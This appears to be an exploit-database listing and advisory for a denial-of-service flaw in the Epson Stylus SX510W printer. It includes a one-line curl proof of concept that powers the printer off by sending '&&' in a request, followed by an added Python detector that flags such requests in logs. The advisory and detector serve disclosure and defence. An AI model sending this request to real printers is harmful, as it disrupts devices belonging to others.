
7 changes to exploits/shellcodes/ghdb

FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
Epson Stylus SX510W Printer Remote Power Off - Denial of Service
Job Portal 1.0 - File Upload Restriction Bypass
Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)
TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)

# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-05-16
# Vendor Homepage: https://www.epson.es/
# Software Link: https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
# Tested on: Linux/Windows
# Vulnerability Type: Denial of Service (DoS)

1. Description

The vulnerability occurs when 2 or more &'s are sent to the server in a row ("/PRESENTATION/HTML/TOP/INDEX.HTML"), causing it to shut down.

2. Proof of Concept

Request:

curl -s "http://<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"

3. Solution:

This product version is deprecated.
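
Detection logic for the condition in section 1, as an added example that is not part of the original advisory: it scans access-log or proxy-log request lines for requests to the printer's /PRESENTATION/ web interface whose query string contains two or more consecutive & characters. The common-log-format input, the sample lines, the prefix match on the path and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Path of the printer's embedded web interface, taken from the advisory.
# Matching it case-insensitively and by prefix is an assumption made here
# so that other pages under the same interface are covered too.
PRINTER_PATH_PREFIX = "/presentation/"

# Request part of a common-log-format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Two or more '&' in a row, the condition the advisory describes.
CONSECUTIVE_AMP_RE = re.compile(r"&{2,}")


def is_suspicious_target(target: str) -> bool:
    """True if the request target hits the printer UI with '&&' in its query."""
    parts = urlsplit(target)  # handles both "/path?x" and "http://host/path?x"
    if not parts.path.lower().startswith(PRINTER_PATH_PREFIX):
        return False
    return bool(CONSECUTIVE_AMP_RE.search(parts.query))


def scan_log(lines):
    """Return (line_number, client, target) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # malformed or non-HTTP line: skip it
        if is_suspicious_target(match.group("target")):
            client = line.split(" ", 1)[0]
            hits.append((number, client, match.group("target")))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/May/2020:05:24:20 +0000] "GET /PRESENTATION/HTML/TOP/INDEX.HTML HTTP/1.1" 200 512',
    '192.0.2.44 - - [19/May/2020:05:24:25 +0000] "GET /PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549 HTTP/1.1" 502 0',
    '192.0.2.10 - - [19/May/2020:05:25:02 +0000] "GET /PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&tm=1589865902000 HTTP/1.1" 200 512',
    '192.0.2.51 - - [19/May/2020:05:26:40 +0000] "GET /index.php?a=1&&b=2 HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, client, target in scan_log(SAMPLE_LOG):
        print(f"line {number}: {client} requested {target}")
```

The advisory names no patch, so a hit here is mainly a cue to limit which hosts can reach the printer's web interface.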